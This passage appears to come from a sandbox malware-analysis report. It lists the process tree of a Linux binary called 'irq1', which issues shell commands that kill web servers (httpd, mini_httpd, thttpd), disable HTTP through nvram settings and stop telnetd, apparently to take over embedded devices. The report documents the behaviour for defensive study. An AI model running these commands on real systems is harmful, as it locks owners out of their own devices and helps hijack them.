    Analysis Process: sh PID: 6347 Parent PID: 6344

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: uname PID: 6347 Parent PID: 6344

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:/bin/uname
    Arguments:/bin/uname -n
    File size:31440 bytes
    MD5 hash:1078d9dca4e90919f7b2433cae105008

    Analysis Process: irq1 PID: 7189 Parent PID: 6305

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 7189 Parent PID: 6305

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "kill -9 `cat /var/run/httpd.pid` > /dev/null 2>&1 &"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 7191 Parent PID: 7189

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 7192 Parent PID: 7191

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: cat PID: 7192 Parent PID: 7191

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/bin/cat
    Arguments:cat /var/run/httpd.pid
    File size:52080 bytes
    MD5 hash:efa10d52f37361f2e3a5d22742f0fcc4

    Analysis Process: irq1 PID: 7193 Parent PID: 6305

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 7193 Parent PID: 6305

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "service httpd stop > /dev/null 2>&1 &"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 7195 Parent PID: 7193

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: service PID: 7195 Parent PID: 3310

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:/bin/sh /usr/sbin/service httpd stop
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: service PID: 7232 Parent PID: 7195

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: basename PID: 7232 Parent PID: 7195

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/usr/bin/basename
    Arguments:basename /usr/sbin/service
    File size:31408 bytes
    MD5 hash:fd7bba8b11b99ec7559f30226c79a729

    Analysis Process: service PID: 7239 Parent PID: 7195

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: basename PID: 7239 Parent PID: 7195

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/usr/bin/basename
    Arguments:basename /usr/sbin/service
    File size:31408 bytes
    MD5 hash:fd7bba8b11b99ec7559f30226c79a729

    Analysis Process: service PID: 7268 Parent PID: 7195

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7268 Parent PID: 7195

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl --quiet is-active multi-user.target
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 7308 Parent PID: 7195

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: service PID: 7311 Parent PID: 7308

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7311 Parent PID: 7308

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl list-unit-files --full --type=socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 7312 Parent PID: 7308

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: sed PID: 7312 Parent PID: 7308

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/bin/sed
    Arguments:sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
    File size:73424 bytes
    MD5 hash:c1a00c583ba08e728b10f3f46f5776d6

    Analysis Process: service PID: 7558 Parent PID: 7195

    General

    Start time:05:27:22
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7558 Parent PID: 7195

    General

    Start time:05:27:22
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show acpid.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 7599 Parent PID: 7195

    General

    Start time:05:27:22
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7599 Parent PID: 7195

    General

    Start time:05:27:22
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show apport-forward.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 7615 Parent PID: 7195

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7615 Parent PID: 7195

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show avahi-daemon.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 7634 Parent PID: 7195

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7634 Parent PID: 7195

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show cups.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 7669 Parent PID: 7195

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7669 Parent PID: 7195

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show dbus.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 7696 Parent PID: 7195

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7696 Parent PID: 7195

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show dm-event.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 7722 Parent PID: 7195

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7722 Parent PID: 7195

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show lvm2-lvmetad.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 7730 Parent PID: 7195

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7730 Parent PID: 7195

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show lvm2-lvmpolld.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 7776 Parent PID: 7195

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7776 Parent PID: 7195

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show lxd.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 7792 Parent PID: 7195

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7792 Parent PID: 7195

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show saned.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 7820 Parent PID: 7195

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7820 Parent PID: 7195

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show snapd.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 7841 Parent PID: 7195

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7841 Parent PID: 7195

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show ssh.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 7881 Parent PID: 7195

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7881 Parent PID: 7195

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show syslog.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 7895 Parent PID: 7195

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7895 Parent PID: 7195

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-bus-proxyd.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 7938 Parent PID: 7195

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7938 Parent PID: 7195

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-fsckd.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 7951 Parent PID: 7195

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7951 Parent PID: 7195

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-initctl.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 7976 Parent PID: 7195

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7976 Parent PID: 7195

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-journald-audit.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 8011 Parent PID: 7195

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 8011 Parent PID: 7195

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-journald-dev-log.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 8038 Parent PID: 7195

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 8038 Parent PID: 7195

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-journald.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 8073 Parent PID: 7195

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 8073 Parent PID: 7195

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-networkd.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 8092 Parent PID: 7195

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 8092 Parent PID: 7195

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-rfkill.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 8119 Parent PID: 7195

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 8119 Parent PID: 7195

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-udevd-control.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 8136 Parent PID: 7195

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 8136 Parent PID: 7195

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-udevd-kernel.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 8173 Parent PID: 7195

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 8173 Parent PID: 7195

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show uuidd.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: systemctl PID: 7195 Parent PID: 3310

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl stop httpd.service
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: irq1 PID: 7197 Parent PID: 6305

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 7197 Parent PID: 6305

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "killall -9 mini_httpd > /dev/null 2>&1 &"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 7235 Parent PID: 7197

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: killall PID: 7235 Parent PID: 3310

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/usr/bin/killall
    Arguments:killall -9 mini_httpd
    File size:23736 bytes
    MD5 hash:df59c8b62bfcf5b3bd7feaaa2295a9f7

    Analysis Process: irq1 PID: 7236 Parent PID: 6305

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 7236 Parent PID: 6305

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "killall -9 minihttpd > /dev/null 2>&1 &"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 7261 Parent PID: 7236

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: killall PID: 7261 Parent PID: 7236

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/usr/bin/killall
    Arguments:killall -9 minihttpd
    File size:23736 bytes
    MD5 hash:df59c8b62bfcf5b3bd7feaaa2295a9f7

    Analysis Process: irq1 PID: 7265 Parent PID: 6305

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 7265 Parent PID: 6305

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "kill -9 `cat /var/run/thttpd.pid` > /dev/null 2>&1 &"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 7302 Parent PID: 7265

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 7304 Parent PID: 7302

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: cat PID: 7304 Parent PID: 7302

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/bin/cat
    Arguments:cat /var/run/thttpd.pid
    File size:52080 bytes
    MD5 hash:efa10d52f37361f2e3a5d22742f0fcc4

    Analysis Process: irq1 PID: 7303 Parent PID: 6305

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 7303 Parent PID: 6305

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "nvram set httpd_enable=0 > /dev/null 2>&1"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: irq1 PID: 7307 Parent PID: 6305

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 7307 Parent PID: 6305

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "nvram set http_enable=0 > /dev/null 2>&1"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: irq1 PID: 7326 Parent PID: 6305

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 7326 Parent PID: 6305

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "killall -9 httpd > /dev/null 2>&1 &"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 7358 Parent PID: 7326

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: killall PID: 7358 Parent PID: 3310

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/usr/bin/killall
    Arguments:killall -9 httpd
    File size:23736 bytes
    MD5 hash:df59c8b62bfcf5b3bd7feaaa2295a9f7

    Analysis Process: irq1 PID: 7361 Parent PID: 6305

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 7361 Parent PID: 6305

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "service telnetd stop > /dev/null 2>&1 &"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 7380 Parent PID: 7361

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: service PID: 7380 Parent PID: 3310

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:/bin/sh /usr/sbin/service telnetd stop
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: service PID: 7384 Parent PID: 7380

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: basename PID: 7384 Parent PID: 7380

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/usr/bin/basename
    Arguments:basename /usr/sbin/service
    File size:31408 bytes
    MD5 hash:fd7bba8b11b99ec7559f30226c79a729

    Analysis Process: service PID: 7390 Parent PID: 7380

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: basename PID: 7390 Parent PID: 7380

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/usr/bin/basename
    Arguments:basename /usr/sbin/service
    File size:31408 bytes
    MD5 hash:fd7bba8b11b99ec7559f30226c79a729

    Analysis Process: service PID: 7414 Parent PID: 7380

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7414 Parent PID: 7380

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl --quiet is-active multi-user.target
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 7560 Parent PID: 7380

    General

    Start time:05:27:22
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: service PID: 7564 Parent PID: 7560

    General

    Start time:05:27:22
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7564 Parent PID: 7560

    General

    Start time:05:27:22
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl list-unit-files --full --type=socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 7565 Parent PID: 7560

    General

    Start time:05:27:22
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: sed PID: 7565 Parent PID: 7560

    General

    Start time:05:27:22
    Start date:25/03/2021
    Path:/bin/sed
    Arguments:sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
    File size:73424 bytes
    MD5 hash:c1a00c583ba08e728b10f3f46f5776d6

    Analysis Process: service PID: 7632 Parent PID: 7380

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7632 Parent PID: 7380

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show acpid.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 7635 Parent PID: 7380

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7635 Parent PID: 7380

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show apport-forward.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 7670 Parent PID: 7380

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7670 Parent PID: 7380

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show avahi-daemon.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 7697 Parent PID: 7380

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7697 Parent PID: 7380

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show cups.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 7724 Parent PID: 7380

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7724 Parent PID: 7380

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show dbus.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 7764 Parent PID: 7380

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7764 Parent PID: 7380

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show dm-event.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 7785 Parent PID: 7380

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7785 Parent PID: 7380

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show lvm2-lvmetad.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 7813 Parent PID: 7380

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
